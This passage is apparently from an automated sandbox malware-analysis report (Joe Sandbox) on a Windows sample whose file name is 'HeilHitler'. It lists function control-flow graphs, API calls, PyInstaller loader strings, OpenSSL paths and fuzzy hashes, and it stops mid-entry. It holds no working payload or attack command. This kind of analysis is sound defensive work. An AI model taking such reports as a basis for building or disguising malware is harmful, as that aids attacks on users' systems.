                                                                                                                                                                                                                                            control_flow_graph 786 7ff633d61210-7ff633d6126d call 7ff633d6bd80 789 7ff633d61297-7ff633d612af call 7ff633d74f44 786->789 790 7ff633d6126f-7ff633d61296 call 7ff633d62710 786->790 795 7ff633d612d4-7ff633d612e4 call 7ff633d74f44 789->795 796 7ff633d612b1-7ff633d612cf call 7ff633d74f08 call 7ff633d62910 789->796 802 7ff633d612e6-7ff633d61304 call 7ff633d74f08 call 7ff633d62910 795->802 803 7ff633d61309-7ff633d6131b 795->803 808 7ff633d61439-7ff633d6146d call 7ff633d6ba60 call 7ff633d74f30 * 2 796->808 802->808 806 7ff633d61320-7ff633d61345 call 7ff633d7039c 803->806 814 7ff633d6134b-7ff633d61355 call 7ff633d70110 806->814 815 7ff633d61431 806->815 814->815 822 7ff633d6135b-7ff633d61367 814->822 815->808 824 7ff633d61370-7ff633d61398 call 7ff633d6a1c0 822->824 827 7ff633d6139a-7ff633d6139d 824->827 828 7ff633d61416-7ff633d6142c call 7ff633d62710 824->828 829 7ff633d6139f-7ff633d613a9 827->829 830 7ff633d61411 827->830 828->815 832 7ff633d613ab-7ff633d613b9 call 7ff633d70adc 829->832 833 7ff633d613d4-7ff633d613d7 829->833 830->828 839 7ff633d613be-7ff633d613c1 832->839 834 7ff633d613ea-7ff633d613ef 833->834 835 7ff633d613d9-7ff633d613e7 call 7ff633d89e30 833->835 834->824 838 7ff633d613f5-7ff633d613f8 834->838 835->834 841 7ff633d613fa-7ff633d613fd 838->841 842 7ff633d6140c-7ff633d6140f 838->842 843 7ff633d613c3-7ff633d613cd call 7ff633d70110 839->843 844 7ff633d613cf-7ff633d613d2 839->844 841->828 845 7ff633d613ff-7ff633d61407 841->845 842->815 843->834 843->844 844->828 845->806
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                            • Opcode ID: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
                                                                                                                                                                                                                                            • Instruction ID: d5e919ad1cdf2258e930a2683505d67dca29f55f9e989f0f3a5ac0180549bd08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01d38e4bc7406ff039fcd5bb421c60dd86912a0bfc5eaad0c764dc15b84283c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6251F822A0864285EA209F91E4523BA7390FF85794F844335ED9EE77D5EF3CE545E700
                                                                                                                                                                                                                                            Function 00007FF633D636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636E1
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D63804), ref: 00007FF633D636EB
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62C50: MessageBoxW.USER32 ref: 00007FF633D62D99
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                            • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                            • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                            • Instruction ID: c13f2a38a5be17a066d117a47e39e6235b7b3cb1b116aea74476be53e48fcbf7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217161F1864281FB609BA4E8573B67290BF88354FC01332E56EE77E5EE2CE505E700
                                                                                                                                                                                                                                            Function 00007FF633D7BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1102 7ff633d7ba5c-7ff633d7ba82 1103 7ff633d7ba9d-7ff633d7baa1 1102->1103 1104 7ff633d7ba84-7ff633d7ba98 call 7ff633d74ee8 call 7ff633d74f08 1102->1104 1106 7ff633d7be77-7ff633d7be83 call 7ff633d74ee8 call 7ff633d74f08 1103->1106 1107 7ff633d7baa7-7ff633d7baae 1103->1107 1122 7ff633d7be8e 1104->1122 1124 7ff633d7be89 call 7ff633d7a8e0 1106->1124 1107->1106 1109 7ff633d7bab4-7ff633d7bae2 1107->1109 1109->1106 1113 7ff633d7bae8-7ff633d7baef 1109->1113 1114 7ff633d7bb08-7ff633d7bb0b 1113->1114 1115 7ff633d7baf1-7ff633d7bb03 call 7ff633d74ee8 call 7ff633d74f08 1113->1115 1120 7ff633d7be73-7ff633d7be75 1114->1120 1121 7ff633d7bb11-7ff633d7bb17 1114->1121 1115->1124 1125 7ff633d7be91-7ff633d7bea8 1120->1125 1121->1120 1126 7ff633d7bb1d-7ff633d7bb20 1121->1126 1122->1125 1124->1122 1126->1115 1129 7ff633d7bb22-7ff633d7bb47 1126->1129 1131 7ff633d7bb7a-7ff633d7bb81 1129->1131 1132 7ff633d7bb49-7ff633d7bb4b 1129->1132 1133 7ff633d7bb56-7ff633d7bb6d call 7ff633d74ee8 call 7ff633d74f08 call 7ff633d7a8e0 1131->1133 1134 7ff633d7bb83-7ff633d7bbab call 7ff633d7d5fc call 7ff633d7a948 * 2 1131->1134 1135 7ff633d7bb4d-7ff633d7bb54 1132->1135 1136 7ff633d7bb72-7ff633d7bb78 1132->1136 1163 7ff633d7bd00 1133->1163 1165 7ff633d7bbad-7ff633d7bbc3 call 7ff633d74f08 call 7ff633d74ee8 1134->1165 1166 7ff633d7bbc8-7ff633d7bbf3 call 7ff633d7c284 1134->1166 1135->1133 1135->1136 1137 7ff633d7bbf8-7ff633d7bc0f 1136->1137 1140 7ff633d7bc8a-7ff633d7bc94 call 7ff633d8391c 1137->1140 1141 7ff633d7bc11-7ff633d7bc19 1137->1141 1152 7ff633d7bc9a-7ff633d7bcaf 1140->1152 1153 7ff633d7bd1e 1140->1153 1141->1140 1144 7ff633d7bc1b-7ff633d7bc1d 1141->1144 1144->1140 1148 7ff633d7bc1f-7ff633d7bc35 1144->1148 1148->1140 1155 7ff633d7bc37-7ff633d7bc43 1148->1155 1152->1153 1157 7ff633d7bcb1-7ff633d7bcc3 GetConsoleMode 1152->1157 1161 7ff633d7bd23-7ff633d7bd43 ReadFile 1153->1161 1155->1140 1159 7ff633d7bc45-7ff633d7bc47 1155->1159 1157->1153 1162 7ff633d7bcc5-7ff633d7bccd 1157->1162 1159->1140 1164 7ff633d7bc49-7ff633d7bc61 1159->1164 1167 7ff633d7be3d-7ff633d7be46 GetLastError 1161->1167 1168 7ff633d7bd49-7ff633d7bd51 1161->1168 1162->1161 1170 7ff633d7bccf-7ff633d7bcf1 ReadConsoleW 1162->1170 1173 7ff633d7bd03-7ff633d7bd0d call 7ff633d7a948 1163->1173 1164->1140 1174 7ff633d7bc63-7ff633d7bc6f 1164->1174 1165->1163 1166->1137 1171 7ff633d7be48-7ff633d7be5e call 7ff633d74f08 call 7ff633d74ee8 1167->1171 1172 7ff633d7be63-7ff633d7be66 1167->1172 1168->1167 1176 7ff633d7bd57 1168->1176 1179 7ff633d7bcf3 GetLastError 1170->1179 1180 7ff633d7bd12-7ff633d7bd1c 1170->1180 1171->1163 1184 7ff633d7be6c-7ff633d7be6e 1172->1184 1185 7ff633d7bcf9-7ff633d7bcfb call 7ff633d74e7c 1172->1185 1173->1125 1174->1140 1183 7ff633d7bc71-7ff633d7bc73 1174->1183 1177 7ff633d7bd5e-7ff633d7bd73 1176->1177 1177->1173 1187 7ff633d7bd75-7ff633d7bd80 1177->1187 1179->1185 1180->1177 1183->1140 1191 7ff633d7bc75-7ff633d7bc85 1183->1191 1184->1173 1185->1163 1193 7ff633d7bda7-7ff633d7bdaf 1187->1193 1194 7ff633d7bd82-7ff633d7bd9b call 7ff633d7b674 1187->1194 1191->1140 1198 7ff633d7be2b-7ff633d7be38 call 7ff633d7b4b4 1193->1198 1199 7ff633d7bdb1-7ff633d7bdc3 1193->1199 1202 7ff633d7bda0-7ff633d7bda2 1194->1202 1198->1202 1203 7ff633d7bdc5 1199->1203 1204 7ff633d7be1e-7ff633d7be26 1199->1204 1202->1173 1206 7ff633d7bdca-7ff633d7bdd1 1203->1206 1204->1173 1207 7ff633d7be0d-7ff633d7be18 1206->1207 1208 7ff633d7bdd3-7ff633d7bdd7 1206->1208 1207->1204 1209 7ff633d7bdd9-7ff633d7bde0 1208->1209 1210 7ff633d7bdf3 1208->1210 1209->1210 1211 7ff633d7bde2-7ff633d7bde6 1209->1211 1212 7ff633d7bdf9-7ff633d7be09 1210->1212 1211->1210 1213 7ff633d7bde8-7ff633d7bdf1 1211->1213 1212->1206 1214 7ff633d7be0b 1212->1214 1213->1212 1214->1204
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                            • Instruction ID: 41e7c414f1f24851d6bd88147b24f59ed5fc926e818fa220cb428853ac172b60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DC12922A1CB8781E7619F9590462BD7B60FF81B90F594331EA8EA3791CF7CE845A700
                                                                                                                                                                                                                                            Function 00007FF633D66360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                            • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                            • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                            • Instruction ID: 1349cc8312471161d2379808559c6e6d0b30e26a3d080edb85694fb6660dab5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E417131A1DA8691EA21DBA4E4162E97361FF44344FC00332EA6DA7795EF3CF519D740
                                                                                                                                                                                                                                            Function 00007FF633D75628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                            • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                            • Instruction ID: b6ea347872c606fc651df10970017495f6d5f098589fa492bb20860db60ab8b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB41AF22E1878283E7508FA095123BD7361FB947A4F109335EAAC97BD2DF7CA5E19701
                                                                                                                                                                                                                                            Function 00007FF633D6CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                            • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                            • Instruction ID: 225631809ee873c906d65c0a2f884c8556d03b12ba005d688212f58f9edddcff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E315D21E0C14745FA14ABE5A4533B93691AF41784F845734EA2EFB3E7DE6CB804E710
                                                                                                                                                                                                                                            Function 00007FFDFAE8146A Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                            • API String ID: 1452528299-2512360314
                                                                                                                                                                                                                                            • Opcode ID: ee442aae15e5596c2213ec8fd07130747ec22657d04e437eb1166b1a36e472a3
                                                                                                                                                                                                                                            • Instruction ID: d36fa133e8e828faadf3903ce80365cd8f60af7a27346b2b12d904cbc34d355d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee442aae15e5596c2213ec8fd07130747ec22657d04e437eb1166b1a36e472a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90B19172B0824286E76AAF25C460B7A33E1EF40B48F1555B5DA6E476DDDF3EE884C700
                                                                                                                                                                                                                                            Function 00007FFDFAE81497 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                            • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                            • Opcode ID: 2f069f0debedb460f97cf309107711c0ac6c72eae5d4146433fa6f897ae7624f
                                                                                                                                                                                                                                            • Instruction ID: 416900013d54c14aa5027054142ba82e30f9f373858a7fb9fc9b80d35ba719a0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f069f0debedb460f97cf309107711c0ac6c72eae5d4146433fa6f897ae7624f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14819131B08A8185EB59AF25D4A4BB96391FB40B98F148175DD6E0B7CCDF3AD44AC340
                                                                                                                                                                                                                                            Function 00007FF633D7013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction ID: fc5356c7eb802d985e62e58080e3a4ed0cc3ff611ae5dba2789b26f0a536a27a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A512422B0925286FB289EF5A40267A6691BF84BB4F184734DE7DE77D5CE3CE401A600
                                                                                                                                                                                                                                            Function 00007FFDFAE81253 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
